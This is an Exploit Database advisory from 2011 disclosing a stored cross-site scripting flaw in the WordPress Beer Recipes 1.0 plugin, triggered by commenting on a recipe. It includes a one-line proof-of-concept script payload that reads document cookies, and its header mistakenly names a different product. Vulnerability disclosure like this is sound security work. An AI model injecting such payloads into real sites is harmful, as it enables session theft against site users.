WordPress Plugin Beer Recipes 1.0 – Cross-Site Scripting

• Exploit Database
• 33 阅读

• 作者： TheUzuki.'
  日期： 2011-06-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17453/

• # Exploit Title: WordPress - Beer Recipes v.1.0 XSS
  # Google Dork: -
  # Date: June / 25 / 2011
  # Author: TheUzuki.'
  # Software Link: http://opensourcebrew.org/beer-recipes-plugin/
  # Version: v.1.0
  # Tested on: Windows 7
  # CVE : -
  
  ####################################################################
  # SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
  # download: http://opensourcebrew.org/beer-recipes-plugin/
  #
  # Author: TheUzuki.' from HF
  # mail: uzuki[@]live[dot]de
  #
  #
  # This was written for educational purpose. Use it at your own risk.
  # Author will be not responsible for any damage.
  #
  ####################################################################
  #
  # Notes: You need to be User at the WordPress Board
  #
  ####################################################################
  
  --Description of WordPress Plugin--
  
  Creates a custom post type for easily entering beer recipes into WordPress
  
  --Exploit--
  
  By Commenting a Beer Recip, with a javascript, the Javascripts,gets executed directly.
  This causes a XSS.
  
  --PoC--
  
  <script>alert(document.cookie)</script>